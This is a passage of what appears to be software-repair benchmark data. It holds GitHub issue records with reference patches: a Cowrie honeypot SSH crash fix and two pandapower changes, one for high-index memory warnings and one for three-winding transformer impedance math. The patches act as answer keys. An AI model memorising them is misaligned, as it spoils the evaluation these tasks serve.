self.lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 190, in lineReceived self.cmdstack[-1].lineReceived(line) File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 114, in lineReceived self.runCommand() File "/home/cowrie/cowrie/src/cowrie/shell/honeypot.py", line 329, in runCommand self.protocol.call_command(pp, cmdclass, *cmd_array[0]["rargs"]) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 310, in call_command HoneyPotBaseProtocol.call_command(self, pp, cmd, *args) File "/home/cowrie/cowrie/src/cowrie/shell/protocol.py", line 199, in call_command obj.start() File "/home/cowrie/cowrie/src/cowrie/commands/gcc.py", line 135, in start self.scheduled = reactor.callLater( # type: ignore[attr-defined] File "/home/cowrie/cowrie/cowrie-env/lib/python3.10/site-packages/twisted/internet/base.py", line 868, in callLater assert builtins.callable(callable), f"{callable} is not callable" builtins.AssertionError: None is not callable ```
2022-08-28T09:33:51
cowrie/cowrie
1,817
cowrie__cowrie-1817
[ "1815" ]
bf55a591bfada6ce2ca43391c784a5e9c2b98ee3
diff --git a/src/cowrie/ssh/transport.py b/src/cowrie/ssh/transport.py --- a/src/cowrie/ssh/transport.py +++ b/src/cowrie/ssh/transport.py @@ -113,18 +113,18 @@ def dataReceived(self, data: bytes) -> None: if not self.gotVersion: if b"\n" not in self.buf: return - otherVersion: bytes = self.buf.split(b"\n")[0].strip() + self.otherVersionString: bytes = self.buf.split(b"\n")[0].strip() log.msg( eventid="cowrie.client.version", - version=otherVersion.decode( + version=self.otherVersionString.decode( "utf-8", errors="backslashreplace" ), format="Remote SSH version: %(version)s", ) - m = re.match(rb"SSH-(\d+.\d+)-(.*)", otherVersion) + m = re.match(rb"SSH-(\d+.\d+)-(.*)", self.otherVersionString) if m is None: log.msg( - f"Bad protocol version identification: {repr(otherVersion)}" + f"Bad protocol version identification: {repr(self.otherVersionString)}" ) # OpenSSH sending the same message self.transport.write(b"Invalid SSH identification string.\n") @@ -133,7 +133,7 @@ def dataReceived(self, data: bytes) -> None: self.gotVersion = True remote_version = m.group(1) if remote_version not in self.supportedVersions: - self._unsupportedVersionReceived(otherVersion) + self._unsupportedVersionReceived(self.otherVersionString) return i = self.buf.index(b"\n") self.buf = self.buf[i + 1 :] diff --git a/src/cowrie/ssh_proxy/server_transport.py b/src/cowrie/ssh_proxy/server_transport.py --- a/src/cowrie/ssh_proxy/server_transport.py +++ b/src/cowrie/ssh_proxy/server_transport.py @@ -211,18 +211,18 @@ def dataReceived(self, data: bytes) -> None: if not self.gotVersion: if b"\n" not in self.buf: return - otherVersion = self.buf.split(b"\n")[0].strip() + self.otherVersionString = self.buf.split(b"\n")[0].strip() log.msg( eventid="cowrie.client.version", - version=otherVersion.decode( + version=self.otherVersionString.decode( "utf-8", errors="backslashreplace" ), format="Remote SSH version: %(version)s", ) - m = re.match(rb"SSH-(\d+.\d+)-(.*)", otherVersion) + m = re.match(rb"SSH-(\d+.\d+)-(.*)", self.otherVersionString) if m is None: log.msg( - f"Bad protocol version identification: {repr(otherVersion)}" + f"Bad protocol version identification: {repr(self.otherVersionString)}" ) if self.transport: self.transport.write(b"Protocol mismatch.\n")
builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' **Describe the bug** I used the docker version of cowrie and got this error: `builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString'` when I tried SSH to the cowrie server. **To Reproduce** 1. create a docker compose service file `compose.yaml` ```yaml services: 2 cowrie: 3 image: cowrie/cowrie:latest 4 ports: 5 - "22:2222" 17 restart: always ``` 2. start cowrie by executing `docker compose up` in the directory the `compose.yaml` file located 3. perform a SSH login attempt from otherwhere(e.g. from a windows PC): `ssh -p22 cowrie_server_ip` 4. get the `Connection closed by cowrie_server_ip port 22` error from your SSH client 5. check the cowrie's log and find the `builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString'` error **Expected behavior** cowrie should welcome the SSH login attempt correctly. **Server (please complete the following information):** - OS: [5.15.0-58-generic # 64~20.04.1-**Ubuntu** SMP Fri Jan 6 16:42:31 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux] - Python: [3.8.10] **Additional context** ### full log ``` cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:97: CryptographyDeprecationWarning: Blowfish has been deprecated cowrie-cowrie-1 | b"blowfish-cbc": (algorithms.Blowfish, 16, modes.CBC), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:101: CryptographyDeprecationWarning: CAST5 has been deprecated cowrie-cowrie-1 | b"cast128-cbc": (algorithms.CAST5, 16, modes.CBC), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:106: CryptographyDeprecationWarning: Blowfish has been deprecated cowrie-cowrie-1 | b"blowfish-ctr": (algorithms.Blowfish, 16, modes.CTR), cowrie-cowrie-1 | /cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py:107: CryptographyDeprecationWarning: CAST5 has been deprecated cowrie-cowrie-1 | b"cast128-ctr": (algorithms.CAST5, 16, modes.CTR), cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Python Version 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Twisted Version 22.10.0 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Cowrie Version 2.5.0 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Loaded output engine: jsonlog cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Loaded output engine: textlog cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] twistd 22.10.0 (/cowrie/cowrie-env/bin/python3 3.9.2) starting up. cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [twisted.scripts._twistd_unix.UnixAppLogger#info] reactor class: twisted.internet.epollreactor.EPollReactor. cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] CowrieSSHFactory starting on 2222 cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [cowrie.ssh.factory.CowrieSSHFactory#info] Starting factory <cowrie.ssh.factory.CowrieSSHFactory object at 0x7fdce7e47b50> cowrie-cowrie-1 | 2023-02-03T04:56:29+0000 [-] Ready to accept SSH connections cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha256 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.factory.CowrieSSHFactory] New connection: 10.249.47.179:35369 (172.19.0.2:2222) [session: 6ebb4f6a7eca] cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Remote SSH version: SSH-2.0-OpenSSH_for_Windows_8.1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] SSH client hassh fingerprint: ec7378c1a92f5a8dde7e8b7a1ddf33d1 cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ecdsa-sha2-nistp256' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] outgoing: b'aes128-ctr' b'hmac-sha2-512' b'none' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] incoming: b'aes128-ctr' b'hmac-sha2-512' b'none' cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Unhandled Error cowrie-cowrie-1 | Traceback (most recent call last): cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 96, in callWithLogger cowrie-cowrie-1 | return callWithContext({"system": lp}, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 80, in callWithContext cowrie-cowrie-1 | return context.call({ILogContext: newCtx}, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext cowrie-cowrie-1 | return self.currentContext().callWithContext(ctx, func, *args, **kw) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext cowrie-cowrie-1 | return func(*args, **kw) cowrie-cowrie-1 | --- <exception caught here> --- cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite cowrie-cowrie-1 | why = selectable.doRead() cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 248, in doRead cowrie-cowrie-1 | return self._dataReceived(data) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived cowrie-cowrie-1 | rval = self.protocol.dataReceived(data) cowrie-cowrie-1 | File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 144, in dataReceived cowrie-cowrie-1 | self.dispatchMessage(messageNum, packet[1:]) cowrie-cowrie-1 | File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 148, in dispatchMessage cowrie-cowrie-1 | transport.SSHServerTransport.dispatchMessage(self, messageNum, payload) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 781, in dispatchMessage cowrie-cowrie-1 | f(payload) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1618, in ssh_KEX_DH_GEX_REQUEST_OLD cowrie-cowrie-1 | return self._ssh_KEX_ECDH_INIT(packet) cowrie-cowrie-1 | File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1530, in _ssh_KEX_ECDH_INIT cowrie-cowrie-1 | h.update(NS(self.otherVersionString)) cowrie-cowrie-1 | builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' cowrie-cowrie-1 | cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#info] connection lost cowrie-cowrie-1 | 2023-02-03T04:56:39+0000 [HoneyPotSSHTransport,0,10.249.47.179] Connection lost after 0 seconds ```
Hi @HuengchI I was having the same, and ended up moving backwards from latest through the images. and cowrie/cowrie:59f4ed7f worked for me. https://hub.docker.com/r/cowrie/cowrie/tags > I was having the same, and ended up moving backwards from latest through the images. and cowrie/cowrie:59f4ed7f worked for me. @jquiros2 Thanks! I'll have a try. It seems that the latest version has some bugs. The same error occurs even when I performed a ["7-step standard installation"](https://cowrie.readthedocs.io/en/latest/INSTALL.html#installing-cowrie-in-seven-steps) following the document. I have the same issue with the latest image. 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha1 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] No moduli, no diffie-hellman-group-exchange-sha256 2023-02-05T08:37:35+0000 [cowrie.ssh.factory.CowrieSSHFactory] New connection: 192.168.1.15:65199 (172.17.0.4:2222) [session: 55969b675696] 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Remote SSH version: SSH-2.0-PuTTY_Release_0.76 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] SSH client hassh fingerprint: 5b7713a9ef2d162b16ea018fa8d40f02 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ssh-ed25519' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha1' b'none' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha1' b'none' 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Unhandled Error Traceback (most recent call last): File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 96, in callWithLogger return callWithContext({"system": lp}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/log.py", line 80, in callWithContext return context.call({ILogContext: newCtx}, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext return self.currentContext().callWithContext(ctx, func, *args, **kw) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext return func(*args, **kw) --- <exception caught here> --- File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite why = selectable.doRead() File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 248, in doRead return self._dataReceived(data) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived rval = self.protocol.dataReceived(data) File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 144, in dataReceived self.dispatchMessage(messageNum, packet[1:]) File "/cowrie/cowrie-git/src/cowrie/ssh/transport.py", line 148, in dispatchMessage transport.SSHServerTransport.dispatchMessage(self, messageNum, payload) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 781, in dispatchMessage f(payload) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1618, in ssh_KEX_DH_GEX_REQUEST_OLD return self._ssh_KEX_ECDH_INIT(packet) File "/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/conch/ssh/transport.py", line 1530, in _ssh_KEX_ECDH_INIT h.update(NS(self.otherVersionString)) builtins.AttributeError: 'HoneyPotSSHTransport' object has no attribute 'otherVersionString' 2023-02-05T08:37:35+0000 [cowrie.ssh.transport.HoneyPotSSHTransport#info] connection lost 2023-02-05T08:37:35+0000 [HoneyPotSSHTransport,3,192.168.1.15] Connection lost after 0 seconds Confirmed bug! Sorry about this! This shows the testing framework needs an integration test.
2023-02-06T02:10:24
e2nIEE/pandapower
97
e2nIEE__pandapower-97
[ "93" ]
fbdf93fcd56d7709076130e67e469b3b0b722370
diff --git a/pandapower/auxiliary.py b/pandapower/auxiliary.py --- a/pandapower/auxiliary.py +++ b/pandapower/auxiliary.py @@ -399,6 +399,17 @@ def _check_bus_index_and_print_warning_if_high(net, n_max=1e7): " Try resetting the bus indices with the toolbox function " "create_continous_bus_index()" % max_bus) +def _check_gen_index_and_print_warning_if_high(net, n_max=1e7): + if net.gen.empty: + return + max_gen = max(net.gen.index.values) + if max_gen >= n_max and len(net["gen"]) < n_max: + logger.warning( + "Maximum generator index is high (%i). You should avoid high generator indices because of perfomance reasons." + #" Try resetting the bus indices with the toolbox function " + #"create_continous_bus_index()" + % max_gen) + def _add_pf_options(net, tolerance_kva, trafo_loading, numba, ac, algorithm, max_iteration, **kwargs): diff --git a/pandapower/run.py b/pandapower/run.py --- a/pandapower/run.py +++ b/pandapower/run.py @@ -7,7 +7,8 @@ import numpy as np from pandapower.auxiliary import _add_pf_options, _add_ppc_options, _add_opf_options, \ - _check_if_numba_is_installed, _check_bus_index_and_print_warning_if_high + _check_if_numba_is_installed, _check_bus_index_and_print_warning_if_high, \ + _check_gen_index_and_print_warning_if_high from pandapower.optimal_powerflow import _optimal_powerflow from pandapower.opf.validate_opf_input import _check_necessary_opf_parameters from pandapower.powerflow import _powerflow @@ -244,6 +245,7 @@ def runpp(net, algorithm='nr', calculate_voltage_angles="auto", init="auto", max # net.__internal_options.update(overrule_options) net._options.update(overrule_options) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _powerflow(net, **kwargs) @@ -310,6 +312,7 @@ def rundcpp(net, trafo_model="t", trafo_loading="current", recycle=None, check_c _add_pf_options(net, tolerance_kva=tolerance_kva, trafo_loading=trafo_loading, numba=numba, ac=ac, algorithm=algorithm, max_iteration=max_iteration) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _powerflow(net, **kwargs) @@ -385,6 +388,7 @@ def runopp(net, verbose=False, calculate_voltage_angles=False, check_connectivit voltage_depend_loads=False, delta=delta) _add_opf_options(net, trafo_loading=trafo_loading, ac=ac, numba=numba) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _optimal_powerflow(net, verbose, suppress_warnings, **kwargs) @@ -446,4 +450,5 @@ def rundcopp(net, verbose=False, check_connectivity=True, suppress_warnings=True voltage_depend_loads=False, delta=delta) _add_opf_options(net, trafo_loading=trafo_loading, ac=ac) _check_bus_index_and_print_warning_if_high(net) + _check_gen_index_and_print_warning_if_high(net) _optimal_powerflow(net, verbose, suppress_warnings, **kwargs)
Large indices lead to high memory consumption Creating a network with large indices e.g. when creating generators leads to high memory consumption. The problem is the line `lookup = -np.ones(max(pandapower_index) + 1, dtype=int)` when building the lookup: https://github.com/lthurner/pandapower/blob/aef97f1f16ab496dd7d0b772c486b6e3be566b93/pandapower/pd2ppc.py#L255-L269 If one index is very large this creates a huge (mostly empty) ndarray, filling the memory. While I have not checked with the rest of the code this seemes unnecessary. The same problem exists when building the bus lookup: https://github.com/lthurner/pandapower/blob/aef97f1f16ab496dd7d0b772c486b6e3be566b93/pandapower/build_bus.py#L109-L117 For buses a workaround is to call `pandapower.create_continuous_bus_index(net, start=0)` before running the powerflow. The problem only becomes significant for large indices of greater than 100000000 which might be unusual but occured in some of my calculations. For smaller indices it still seems like a waste of memory though.
Our tests showed that the current implementation of the bus lookup (+numba) is the most performant one. So we decided to trade a slightly higher memory usage with increased performance (the resulting memory footprint is negligible for reasonable maximal bus indizes). In order to let unaware user know about this peculiarity we log a warning in case large bus indize values are encountered. I was not aware that we use a similar implementation for element lookup. Maybe we should log a warning here too. The problem should be easily solved by net.gen.reset_index(inplace=True) ? Thanks for the explanation. If you have done the tests I am the last person who stands in the way of a performance increase by wasting a bit of memory, which in most cases should indeed be insignificant. However a warning would be nice. But I wonder if you have considered very sparse indices in your performance tests. I would suspect that the performance/number of elements would decrease with a more sparse indices? The data I am dealing with at the moment uses one continuus index for all types of network elements, which leads to a sparse index for one type of element. Initally I used `create_continuous_bus_index` and ignored the index for all other elements to make it run at all, but this makes comparison with the original data very hard. Luckily I can process the original data for a more compact index, since already for that data an index of > 100000000 is not necessary. So I still would recommend a warning and I still might hit this problem in the future when dealing with larger data sets... FYI, a little bit of history: The first implementation was with dicts and very low memory consumption, with key = pandapower index, val = ppc index This was really slow for large arrays since it was necessary to iterate over every key in the dict. Since every index is unique we switched to the array where array_index = pandapower index array_val = ppc_index As ascheidl said, this is the fastest solution we found, but has problems with large indices. Maybe a sparse lookup would be a compromise here. Thank you for the hint! One additional note on using very high index numbers: a use case where this happens if you have some identifying number that you want to use as an index. I don't know if that's your usecase or not, but if so, an alternative to using the id as an index is to just use continuous indices when creating the net, and put the IDs in a new column, e.g. net.bus.ID. This way you avoid the memory problem, and you also avoid losing leading or trailing zeros. Because if you have an ID such as 0125810, this would become index 12581 and you might have trouble identifying it later on. If you save it in a new column as a string, all information can be preserved. Regarding the idea of a sparse lookup array, I tested it with a pandas SparseArray. The access times are significantly higher with the sparse solution, especially if not one value is accessed, but many at one time: >dense = np.random.randn(1000000) sparse = pd.SparseArray(dense) >%timeit dense[500:1000] 631 ns ± 36.9 ns per loop (mean ± std. dev. of 7 runs, 1000000 loops each) >%timeit sparse[500:1000] 55.9 ms ± 7.75 ms per loop (mean ± std. dev. of 7 runs, 10 loops each) The sparse array is more efficient in memory, but the access time for multiple values is almost constant for dense arrays. It does not scale well for the sparse version, because premusably values are accessed in a loop. So I don't think thats a viable alternative. #edit: The first implementation with dictionaries in comparison: >lookup = {i: i for i in range(500, 1000)} >%timeit [lookup[i] for i in range(500, 1000)] 115 µs ± 6.92 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)
2018-04-11T09:13:10
e2nIEE/pandapower
102
e2nIEE__pandapower-102
[ "54" ]
9f093d930a99d5d61af5659c8505fb9009f525db
diff --git a/pandapower/build_branch.py b/pandapower/build_branch.py --- a/pandapower/build_branch.py +++ b/pandapower/build_branch.py @@ -443,8 +443,10 @@ def _trafo_df_from_trafo3w(net): kt = _transformer_correction_factor(vsc, vscr, sn, 1.1) vsc_2w_delta *= kt vscr_2w_delta *= kt - vsc_2w = wye_delta(vsc_2w_delta, sn) + vsci_2w_delta = np.sqrt( vsc_2w_delta ** 2 - vscr_2w_delta ** 2) vscr_2w = wye_delta(vscr_2w_delta, sn) + vsci_2w = wye_delta(vsci_2w_delta, sn) + vsc_2w = np.sign(vsci_2w) * np.sqrt(vsci_2w ** 2 + vscr_2w ** 2) taps = [dict((tv, np.nan) for tv in tap_variables) for _ in range(3)] for k in range(3): taps[k]["tp_side"] = None @@ -888,4 +890,4 @@ def _transformer_correction_factor(vsc, vscr, sn, cmax): def get_is_lines(net): _is_elements = net["_is_elements"] - _is_elements["line"] = net["line"][net["line"]["in_service"].values.astype(bool)] \ No newline at end of file + _is_elements["line"] = net["line"][net["line"]["in_service"].values.astype(bool)]
build branches from trafo3w **Issue** In a very specific cases of 3winding transformer parameters, it may happen that short circuit impedance `z_sc` ends up as smaller than resistance `r_sc`, specifically this results in [this line](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L364) with negative value in sqrt (and nan value of `x_sc` and singular jacobian matrix). **Error log**: ![image](https://user-images.githubusercontent.com/9588722/27687950-0ee21382-5cd9-11e7-92af-bdab47ed3444.png) **Reason** for this behavior is the following: three winding transformers are first transformed to equivalent 2winding transformers (wye-delta transformation) and then branches are created using the same routines as for 2winding transformers (there is a reason for this: 3w and 2w transformer use the same build_branch routines, so in the developing phase any change for 2w holds for 3w). After wye-delta conversion resulting parameters does not represent any physical values, so they can get some unrealistic values (even negative values are possible). More specifically, after conversion of 3w transformers to 2w, resulting `vsc_percent` and `vscr_percent` of each transformer for some specific cases can get such values that `z_sc<r_sc`. **Solution suggestion**: Instead of transforming a 3winding transformer to 2winding and then building branches from 2winding transformers, a direct building of 3 branches from a 3winding transformer should be implemented. Also, first branch impedance should be calculated and then wye-delta conversion performed. This should result with exactly the same branch values in all cases, but avoid this issue in such specific cases.
Yes this is a good idea, please go ahead. Please also add one of these special cases to the test suite so this behaviour is tested for the future. Maybe while we are looking into 3W transformers we can also adress switches at 3W transformers as discussed in #30 There are some more issues within this issue that I mentioned when building branches from a 3winding trafo, which I noticed due to difference from branches parameters obtained using the current pandapower realease and the branches I got: - when [calculating](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L298) magnetising admittance, `sn_hv_kva` is used, and I think `min(sn_hv_kva, sn_mv_kva) `should be used !? (if I am not terribly wrong?) ![image](https://user-images.githubusercontent.com/9588722/28774656-d2a4f28e-75ee-11e7-9a77-0b1ebce43c57.png) - in the current implementation, first `vsc_percent` and `vscr_percent` are transformed delta-to-wye and then r and x are calculated from them for each of 3 branches. The right order should be to first calculate `x12, x23, x13` and than make wye-delta transformation. In other words, result is not the same if one first transforms `z12, z23, z13` to `z1, z2, z3` and then calculates `x1, x2, x3`...than if one first calculates `x12, x23, x13` and then transforms them to `x1, x2, x3` There are some less important things to be mentioned: - documentation for the trafo3w should be updated in any case (there is no any mention of `min(sn_hv_kva, sn_mv_kva)`) - using `shift_mv_degree` and `shift_mv_degree` is not really clear to me? phase shift should be related to tap, so if there is one tap on a trafo3w, there should be only one phase_shift, then internally this tap should be calculated for each side? if I am not terribly wrong? - by direct generation of branches from 3winding transformers, there is no need to define voltage level of the additional bus. All the values are calculated on the side of the additional bus, where we can assume base(nominal) voltage is equal to rated. - why this: `b_img[b_img < 0] = 0` [here](https://github.com/lthurner/pandapower/blob/develop/pandapower/build_branch.py#L301) ? Hi Jakov, thanks for taking the time for this implementation, I think it is very good to get a vectorized implementation of the 3 winding transformers. Apart from the incompatibility with certain values there is also the time factor, we recently had a network with several hundred 3w transformers where the 3w conversion took up about 2/3 of the power flow time. This should speed up things nicely. > when calculating magnetising admittance, sn_hv_kva is used, and I think min(sn_hv_kva, sn_mv_kva)should be used !? (if I am not terribly wrong?) Where are these equations from? As far as I understand, all loss factors (like i0_percent for example) are in relation to the rated power of the whole transformer, which is sn_hv_kva. Using min(sn_hv_kva, sn_mv_kva) would mean always using sn_mv_kva, since sn_hv_kva>sn_mv_kva. Why should sn_mv_kva be the reference for the loss parameters? > in the current implementation, first vsc_percent and vscr_percent are transformed delta-to-wye and then r and x are calculated from them for each of 3 branches. The right order should be to first calculate x12, x23, x13 and than make wye-delta transformation. In other words, result is not the same if one first transforms z12, z23, z13 to z1, z2, z3 and then calculates x1, x2, x3...than if one first calculates x12, x23, x13 and then transforms them to x1, x2, x3 Why do you think this would be the right order, do you have a source for that? > using shift_mv_degree and shift_mv_degree is not really clear to me? phase shift should be related to tap, so if there is one tap on a trafo3w, there should be only one phase_shift, then internally this tap should be calculated for each side? if I am not terribly wrong? The phase shift is not necessarily related to the tap changer, it is primarily related to the transformer vector group. The transformer can have a vector group so that the phase shifts of mv and lv side are different. > documentation for the trafo3w should be updated in any case (there is no any mention of min(sn_hv_kva, sn_mv_kva)) Yes should definetly updated, lets do it after the refactoring is done > by direct generation of branches from 3winding transformers, there is no need to define voltage level of the additional bus. All the values are calculated on the side of the additional bus, where we can assume base(nominal) voltage is equal to rated. I don't quite understand what you mean... Don't you need to define a voltage level for the power flow to work? Or do you mean we don't need it because the values are always in per unit and therefore we just assume 1.0 pu as initial voltage? > why this: b_img[b_img < 0] = 0 here ? The magnitude of the magnetizing impedance is defined by i0_percent, the real part of the magnetizing impedance is defined by pfe_kw. If you chose an i0_percent that is small, and an pfe_kw that is large, the imaginary part of the magnetizing impedance would become negative and the transformer would have and capacitive behaviour. In that case the imaginary part is set to zero rather than to model capacitive behaviour in a transformer. This might however be the correct behaviour in 3W transformers where the transformers are only equivalent transformers and might have parameters which are not physically logical. In general, I think we should base our validation on commercial software, which is the only way to know if the model is correct. That is what I tried to do with the test [here](https://github.com/lthurner/pandapower/blob/b86ea6dbe0ab92346d8b9ec718a5daf30f6f4d95/pandapower/test/loadflow/test_results.py#L349). The results in there are extracted from powerfactory, and the voltages match the results from pandapower with a tolerance of 1e-6. That should be the benchmark from my point of view, but we should also add new corner cases (e.g. the one that you experienced where an error occurs). Hi Leon, here are some comments to your answers (your quotation is in italic): > when calculating magnetising admittance, sn_hv_kva is used, and I think min(sn_hv_kva, sn_mv_kva)should be used !? (if I am not terribly wrong?) I've found that in some ABB's technical documentation, even in some university slides, but I cannot find proof for that it in some really relevant source. I would say even scheme from PowerFactory's technical reference ([TechRef_3-W-Transformer.pdf](https://github.com/lthurner/pandapower/files/1269364/TechRef_3-W-Transformer.pdf)) for a 3winding transformers shows that `min(sn_hv_kva, sn_mv_kva)` eventually makes sense: ![image](https://user-images.githubusercontent.com/9588722/29942262-88770098-8e95-11e7-8107-1252370fede8.png) but actually afterwards they explicitly say: *reference power in PowerFactory is equal to HV-side rated power* So we can believe to PowerFactory and use `sn_hv_kva` > result is not the same if one first transforms z12, z23, z13 to z1, z2, z3 and then calculates x1, x2, x3...than if one first calculates x12, x23, x13 and then transforms them to x1, x2, x3 *Why do you think this would be the right order, do you have a source for that?* This can be shown mathematically (I will show example on x1): so if you calculate first x12, x23 and x13 and then do wye-delta conversion to get x1 from x12, x23 and x13: ![image](https://user-images.githubusercontent.com/9588722/29943724-d9378c1e-8e9a-11e7-96b0-f0b3664604b5.png) alternatively, if you first do wye-delta transformation on z and r, i.e. transform z12, z13 and z23 to z1, z2 and z3 and then calculate x1: ![image](https://user-images.githubusercontent.com/9588722/29943816-3eb09662-8e9b-11e7-8d93-dc0cab001a3f.png) now if you compare first and second equation, and develop them you can see that: ![image](https://user-images.githubusercontent.com/9588722/29943846-5c60c894-8e9b-11e7-82a3-b4f26ec15adf.png) the question remains: which method is correct? I believe (I will try to find some relevant reference) the first because impedance should be considered in wye-delta conversion as a vector, not only amplitude (as considered in the second case)...so in the first case this equation holds: ![image](https://user-images.githubusercontent.com/9588722/29944586-4be42864-8e9e-11e7-8697-7caa6e3a09df.png) > *The phase shift is not necessarily related to the tap changer, it is primarily related to the transformer vector group. The transformer can have a vector group so that the phase shifts of mv and lv side are different.* Oh, it is only now clear to me that by `shift_degree` you thought on transformer vector group and clock hour number, and not on a phase-shifting transformer. This is quite a different thing, so only now I also understand why `calculate_voltage_angles` defaults to `False` for transmission... So for proper consideration of a phase-shifting transformer additional parameter (such as *du* in powerFactory) should be added? hereafter is PowerFactory technical reference for 2w transformer to see what I mean about tap of a phase shifting transformer: [TechRef_2-W-Transformer_3Phase.pdf](https://github.com/lthurner/pandapower/files/1269365/TechRef_2-W-Transformer_3Phase.pdf) > there is no need to define voltage level of the additional bus. *Or do you mean we don't need it because the values are always in per unit and therefore we just assume 1.0 pu as initial voltage?* Exactly, that's what I meant...no reason which voltage level is assigned to auxiliary bus, since it is used only internally and its p.u. value will always be 1 p.u. :) > In general, I think we should base our validation on commercial software I completely agree...I'll try to make the model to pass all the validation tests in regard to PowerFactory results... Hi Jakov, looks like we agree in most aspects 👍 The question of wye-delta transformation 